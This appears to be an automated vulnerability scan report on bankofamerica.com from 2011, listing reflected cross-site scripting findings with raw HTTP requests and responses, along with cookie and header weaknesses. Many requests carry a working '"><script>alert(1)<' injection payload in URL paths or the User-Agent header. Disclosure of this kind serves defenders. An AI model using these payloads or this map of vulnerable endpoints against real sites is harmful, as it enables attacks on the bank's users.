1. Cross-site scripting (reflected)
1.1. http://www.bankofamerica.com/creditcards/index.cfm [REST URL parameter 1]
1.2. http://www.bankofamerica.com/deposits/checksave/index.cfm [REST URL parameter 1]
1.3. http://www.bankofamerica.com/deposits/checksave/index.cfm [REST URL parameter 2]
1.4. http://www.bankofamerica.com/findit/locator.cfm [REST URL parameter 1]
1.5. http://www.bankofamerica.com/help/equalhousing.cfm [REST URL parameter 1]
1.6. http://www.bankofamerica.com/help/equalhousing_popup.cfm [REST URL parameter 1]
1.7. http://www.bankofamerica.com/help/index.cfm [REST URL parameter 1]
1.8. http://www.bankofamerica.com/onlinebanking/enroll.cfm [REST URL parameter 1]
1.9. http://www.bankofamerica.com/onlinebanking/index.cfm [REST URL parameter 1]
1.10. http://www.bankofamerica.com/pap/index.cfm [REST URL parameter 1]
1.11. http://www.bankofamerica.com/promos/jump/ktc/index.cfm [REST URL parameter 1]
1.12. http://www.bankofamerica.com/promos/jump/ktc/index.cfm [REST URL parameter 2]
1.13. http://www.bankofamerica.com/promos/jump/ktc/index.cfm [REST URL parameter 3]
1.14. http://www.bankofamerica.com/promos/jump/ktc_coinjar/index.cfm [REST URL parameter 1]
1.15. http://www.bankofamerica.com/promos/jump/ktc_coinjar/index.cfm [REST URL parameter 2]
1.16. http://www.bankofamerica.com/promos/jump/ktc_coinjar/index.cfm [REST URL parameter 3]
1.19. http://www.bankofamerica.com/studentbanking/index.cfm [REST URL parameter 1]
1.20. http://www.bankofamerica.com/surveys/bridge/surveybridge.cfm [REST URL parameter 1]
1.21. http://www.bankofamerica.com/surveys/bridge/surveybridge.cfm [REST URL parameter 2]
1.22. http://www.bankofamerica.com/surveys/popup_visit.cfm [REST URL parameter 1]
1.23. http://www.bankofamerica.com/surveys/survey_popup_invoker.cfm [REST URL parameter 1]
1.24. http://www.bankofamerica.com/surveys/survey_select.cfm [REST URL parameter 1]
1.25. http://www.bankofamerica.com/vehicle_and_personal_loans/index.cfm [REST URL parameter 1]
1.26. http://www.bankofamerica.com/vehicle_and_personal_loans/index.cfm [cm_mmc parameter]
1.27. http://www.bankofamerica.com/vehicle_and_personal_loans/index.cfm [cm_mmc parameter]
1.28. http://www.bankofamerica.com/surveys/popup_visit.cfm [Referer HTTP header]
1.29. http://www.bankofamerica.com/surveys/popup_visit.cfm [User-Agent HTTP header]
1.30. http://www.bankofamerica.com/cferror.cgi [state cookie]
1.31. http://www.bankofamerica.com/findit/error.cgi [state cookie]
1.32. http://www.bankofamerica.com/surveys/flyout/HM_Arrays.js [state cookie]
1.33. http://www.bankofamerica.com/weblinking/flyout/HM_Arrays.js [state cookie]
1.34. http://www.bankofamerica.com/www/global/mvc_objects/images/1pixel_clear.gif [state cookie]
2.1. http://www.bankofamerica.com/onlinebanking/
2.2. http://www.bankofamerica.com/onlinebanking/index.cfm
3. Cookie scoped to parent domain
3.1. http://www.bankofamerica.com/onlinebanking/
3.2. http://www.bankofamerica.com/onlinebanking/index.cfm
3.3. http://www.bankofamerica.com/surveys/bridge/surveybridge.cfm
3.4. http://www.bankofamerica.com/surveys/survey_select.cfm
4. Cross-domain Referer leakage
4.1. http://www.bankofamerica.com/index.cfm
4.2. http://www.bankofamerica.com/onlinebanking/
4.3. http://www.bankofamerica.com/onlinebanking/index.cfm
4.4. http://www.bankofamerica.com/promos/jump/ktc_coinjar/
4.5. http://www.bankofamerica.com/vehicle_and_personal_loans/index.cfm
5. Cross-domain script include
5.1. http://www.bankofamerica.com/index.cfm
5.2. http://www.bankofamerica.com/onlinebanking/
5.3. http://www.bankofamerica.com/onlinebanking/index.cfm
6. Cookie without HttpOnly flag set
6.1. http://www.bankofamerica.com/adtrack/index.cgi
6.2. http://www.bankofamerica.com/coremetrics/cmdatatagutils.js
6.3. http://www.bankofamerica.com/coremetrics/v40/eluminate.js
6.4. http://www.bankofamerica.com/deposits/checksave/stylesheets/common.css
6.5. http://www.bankofamerica.com/deposits/checksave/stylesheets/ktc.css
6.6. http://www.bankofamerica.com/deposits/checksave/stylesheets/mvc_content_style.css
6.7. http://www.bankofamerica.com/favicon.ico
6.8. http://www.bankofamerica.com/findit/error.cgi
6.9. http://www.bankofamerica.com/findit/locator.cfm
6.10. http://www.bankofamerica.com/global/js/masthead.js
6.11. http://www.bankofamerica.com/global/js/mvc-fontsize.js
6.12. http://www.bankofamerica.com/global/js/mvc-js-utils.js
6.13. http://www.bankofamerica.com/global/mvc_objects/flyout/BofA_keyboard_navigation.js
6.14. http://www.bankofamerica.com/global/mvc_objects/flyout/HM_Loader.js
6.15. http://www.bankofamerica.com/global/mvc_objects/stylesheet/hs2_mvc_content_style.css
6.16. http://www.bankofamerica.com/onlinebanking/
6.17. http://www.bankofamerica.com/onlinebanking/index.cfm
6.18. http://www.bankofamerica.com/promos/jump/ktc_coinjar/
6.19. http://www.bankofamerica.com/promos/jump/ktc_coinjar/css/style.css
6.20. http://www.bankofamerica.com/promos/jump/ktc_coinjar/js/loadFuncs.js
6.21. http://www.bankofamerica.com/search/
6.22. http://www.bankofamerica.com/small_business/business_financing/index.cfm
6.23. http://www.bankofamerica.com/small_business/merchant_card_processing/
6.24. http://www.bankofamerica.com/state.cgi
6.25. http://www.bankofamerica.com/surveys/bridge/surveybridge.cfm
6.26. http://www.bankofamerica.com/surveys/bridge/surveybridge.cfm
6.27. http://www.bankofamerica.com/surveys/flyout/HM_Arrays.js
6.28. http://www.bankofamerica.com/surveys/onlineopinionF3cS/oo_conf_en-US.js
6.29. http://www.bankofamerica.com/surveys/onlineopinionF3cS/oo_engine.js
6.30. http://www.bankofamerica.com/surveys/popup_visit.cfm
6.31. http://www.bankofamerica.com/surveys/survey_popup_invoker.cfm
6.32. http://www.bankofamerica.com/surveys/survey_select.cfm
6.33. http://www.bankofamerica.com/weblinking/
6.34. http://www.bankofamerica.com/weblinking/flyout/HM_Arrays.js
6.35. http://www.bankofamerica.com/weblinking/main.css
6.36. http://www.bankofamerica.com/www/global/js/tc_logging.js
6.37. http://www.bankofamerica.com/www/global/js/tc_throttle.js
6.38. http://www.bankofamerica.com/www/global/mvc_objects/images/1pixel_clear.gif
6.39. http://www.bankofamerica.com/www/global/mvc_objects/onlineopinionF3cS/oo_conf_en-US.js
6.40. http://www.bankofamerica.com/www/global/mvc_objects/onlineopinionF3cS/oo_engine.js
9. HTML does not specify charset
9.1. http://www.bankofamerica.com/surveys/bridge/surveybridge.cfm
9.2. http://www.bankofamerica.com/surveys/popup_visit.cfm
9.3. http://www.bankofamerica.com/surveys/survey_popup_invoker.cfm
9.4. http://www.bankofamerica.com/surveys/survey_select.cfm
10. Content type incorrectly stated
10.1. http://www.bankofamerica.com/favicon.ico
10.2. http://www.bankofamerica.com/global/images/new_Banklogo.gif
Severity: | High |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /creditcards/index.cfm |
GET /creditcardsbcca1"><script>alert(1)< Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:35:02 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80 <html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects </head> <body bgcolor="#ffffff" text= ...[SNIP]... <input type="hidden" name="URL" value="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /deposits/checksave/index |
GET /deposits6c81c"><script>alert(1)< Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:34:53 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close <html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects </head> <body bgcolor="#ffffff" text= ...[SNIP]... <input type="hidden" name="URL" value="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /deposits/checksave/index |
GET /deposits/checksave17045"><script>alert(1)< Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:34:54 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close <html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects </head> <body bgcolor="#ffffff" text= ...[SNIP]... <input type="hidden" name="URL" value="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /findit/locator.cfm |
GET /finditd95f8"><script>alert(1)< Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:35:08 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80 <html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects </head> <body bgcolor="#ffffff" text= ...[SNIP]... <input type="hidden" name="URL" value="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /help/equalhousing.cfm |
GET /help8d62e"><script>alert(1)< Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:34:41 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close <html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects </head> <body bgcolor="#ffffff" text= ...[SNIP]... <input type="hidden" name="URL" value="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /help/equalhousing_popup |
GET /helpd8969"><script>alert(1)< Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:34:43 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close <html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects </head> <body bgcolor="#ffffff" text= ...[SNIP]... <input type="hidden" name="URL" value="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /help/index.cfm |
GET /helpbd4c4"><script>alert(1)< Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:34:40 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close <html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects </head> <body bgcolor="#ffffff" text= ...[SNIP]... <input type="hidden" name="URL" value="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /onlinebanking/enroll.cfm |
GET /onlinebanking2c59b"><script>alert(1)< Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:34:50 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close <html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects </head> <body bgcolor="#ffffff" text= ...[SNIP]... <input type="hidden" name="URL" value="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /onlinebanking/index.cfm |
GET /onlinebanking9d26d"><script>alert(1)< Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:34:47 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close <html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects </head> <body bgcolor="#ffffff" text= ...[SNIP]... <input type="hidden" name="URL" value="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /pap/index.cfm |
GET /pape8a18"><script>alert(1)< Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:35:00 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close <html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects </head> <body bgcolor="#ffffff" text= ...[SNIP]... <input type="hidden" name="URL" value="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /promos/jump/ktc/index |
GET /promosad03e"><script>alert(1)< Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:49:02 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close <html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects </head> <body bgcolor="#ffffff" text= ...[SNIP]... <input type="hidden" name="URL" value="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /promos/jump/ktc/index |
GET /promos/jumpa437e"><script>alert(1)< Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:49:03 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close <html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects </head> <body bgcolor="#ffffff" text= ...[SNIP]... <input type="hidden" name="URL" value="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /promos/jump/ktc/index |
GET /promos/jump/ktc4c613"><script>alert(1)< Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:49:03 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close <html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects </head> <body bgcolor="#ffffff" text= ...[SNIP]... <input type="hidden" name="URL" value="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /promos/jump/ktc_coinjar |
GET /promos5eb76"><script>alert(1)< Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:35:07 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80 <html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects </head> <body bgcolor="#ffffff" text= ...[SNIP]... <input type="hidden" name="URL" value="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /promos/jump/ktc_coinjar |
GET /promos/jumpa105b"><script>alert(1)< Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:35:08 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80 <html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects </head> <body bgcolor="#ffffff" text= ...[SNIP]... <input type="hidden" name="URL" value="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /promos/jump/ktc_coinjar |
GET /promos/jump/ktc_coinjar6b820"><script>alert(1)< Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:35:08 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80 <html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects </head> <body bgcolor="#ffffff" text= ...[SNIP]... <input type="hidden" name="URL" value="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /small_business/business |
GET /small_businessf8a0b"><script>alert(1)< Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:35:27 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close <html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects </head> <body bgcolor="#ffffff" text= ...[SNIP]... <input type="hidden" name="URL" value="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /small_business/business |
GET /small_business/business Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:35:29 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close <html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects </head> <body bgcolor="#ffffff" text= ...[SNIP]... <input type="hidden" name="URL" value="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /studentbanking/index.cfm |
GET /studentbanking3063f"><script>alert(1)< Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:34:57 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close <html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects </head> <body bgcolor="#ffffff" text= ...[SNIP]... <input type="hidden" name="URL" value="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /surveys/bridge |
GET /surveys12dd0"><script>alert(1)< Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://locators User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Tue, 28 Jun 2011 21:21:44 GMT Content-type: text/html Page-Completion-Status: Normal Content-Length: 1409 <html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects </head> <body bgcolor="#ffffff" text= ...[SNIP]... <input type="hidden" name="URL" value="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /surveys/bridge |
GET /surveys/bridge8e738"><script>alert(1)< Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://locators User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Tue, 28 Jun 2011 21:21:44 GMT Content-type: text/html Page-Completion-Status: Normal Content-Length: 1409 <html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects </head> <body bgcolor="#ffffff" text= ...[SNIP]... <input type="hidden" name="URL" value="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /surveys/popup_visit.cfm |
GET /surveysc4b84"><script>alert(1)< Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://www.bankofamerica User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Tue, 28 Jun 2011 21:21:55 GMT Content-type: text/html Page-Completion-Status: Normal Content-Length: 1539 <html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects </head> <body bgcolor="#ffffff" text= ...[SNIP]... <input type="hidden" name="URL" value="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /surveys/survey_popup |
GET /surveys78c6e"><script>alert(1)< Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://www.bankofamerica User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Tue, 28 Jun 2011 21:22:12 GMT Content-type: text/html Page-Completion-Status: Normal Content-Length: 1422 <html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects </head> <body bgcolor="#ffffff" text= ...[SNIP]... <input type="hidden" name="URL" value="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /surveys/survey_select |
GET /surveys1b4d0"><script>alert(1)< Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://www.bankofamerica User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Tue, 28 Jun 2011 21:22:07 GMT Content-type: text/html Page-Completion-Status: Normal Content-Length: 1415 <html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects </head> <body bgcolor="#ffffff" text= ...[SNIP]... <input type="hidden" name="URL" value="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /vehicle_and_personal |
GET /vehicle_and_personal Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:36:03 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close <html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects </head> <body bgcolor="#ffffff" text= ...[SNIP]... <input type="hidden" name="URL" value="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.bankofamerica |
Path: | /vehicle_and_personal |
GET /vehicle_and_personal Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:36:10 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal X-FRAME-OPTIONS: SAMEORIGIN Page-Completion-Status: Normal Connection: close <style type="text/css" media="all"> .stb_newtext { color:#CC0000; } .standard-text1 { col ...[SNIP]... ect" coords="465,123,562,145" alt="Visit the Car Buying Center" href="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.bankofamerica |
Path: | /vehicle_and_personal |
GET /vehicle_and_personal Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:36:24 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal X-FRAME-OPTIONS: SAMEORIGIN Page-Completion-Status: Normal Connection: close <style type="text/css" media="all"> .stb_newtext { color:#CC0000; } .standard-text1 { col ...[SNIP]... <a href='http://www ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /surveys/popup_visit.cfm |
GET /surveys/popup_visit.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
HTTP/1.1 500 Internal Server Error Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:35:18 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Page-Completion-Status: Abnormal Connection: close Set-Cookie: BIGipServerngen-www.80 <HTML> <HEAD> <TITLE>An Error Has Occurred</TITLE> </HEAD> <BODY BGCOLOR="#FFFFFF" TEXT="#FFFFFF" LINK="#FFFFFF" VLINK="#FFFFFF" ALINK="#FFFFFF"> <FORM ACTION="/cferror.cgi" METHOD=POST> <SCRIPT LA ...[SNIP]... <INPUT TYPE="hidden" NAME="HTTPRefer" VALUE="http://www.google ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /surveys/popup_visit.cfm |
GET /surveys/popup_visit.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)f8fbc"><script>alert(1)< Connection: close |
